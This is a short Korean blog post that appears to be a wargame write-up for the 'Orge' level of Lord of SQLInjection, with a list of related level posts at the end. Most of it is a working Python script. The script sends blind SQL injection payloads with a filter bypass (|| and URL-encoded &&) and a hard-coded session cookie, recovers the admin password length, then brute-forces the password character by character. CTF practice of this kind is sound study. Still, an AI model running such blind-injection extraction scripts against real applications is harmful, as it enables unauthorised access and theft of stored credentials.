LOS(los.eagle-jump.org) Orge
 이번 문제는 여지껏 풀었던 문제들을 합친 느낌의 문제입니다. 필터링 우회 + Blind SQLi 문제로 앞의 문제를 모두 이해하고 다 푸셨다면 어렵지 않게 푸실 수 있습니다. 다만 &의 경우 URL에 바로 입력하면 인식을 하지 못하므로 %26(&)을 넣어주셔야 합니다. 아래는 풀이 코드

...더보기
import urllib2
import requests

flag = ""
length = 0
i = 1

session = dict(PHPSESSID = "f1gj7fcplbdp1iupb9jcn1sd20")
url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="
while True:
    q = url + "' || id='admin'%26%26 length(pw)="+str(i)+"%23"
    print 'TEST #',i
    print q
    r = requests.post(q, cookies=session)
    if 'Hello admin' in r.text:
        length = i
        break

    i = i + 1

print " PASSWORD LENGTH : ", length

for j in range(1, length +1):
    for i in range(49,123):
        q = url + "'||id='admin'%26%26substr(pw, "+str(j)+",1)="+"'"+chr(i)+"'"+"%23"
        
        print 'TEST #', j, '-', i
        print q
        r = requests.post(q,cookies=session)

        if 'Hello admin' in r.text:
            flag += chr(i)
            print "FLAG : ",flag
            break

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Vampire  (0) 2019.08.18
[Lord of SQLInjection] Troll  (0) 2019.08.18
[Lord of SQLInjection] Darkelf  (0) 2019.08.18
[Lord of SQLInjection] Wolfman  (0) 2019.08.17
[Lord of SQLinjection] Orc  (0) 2019.08.16

+ Recent posts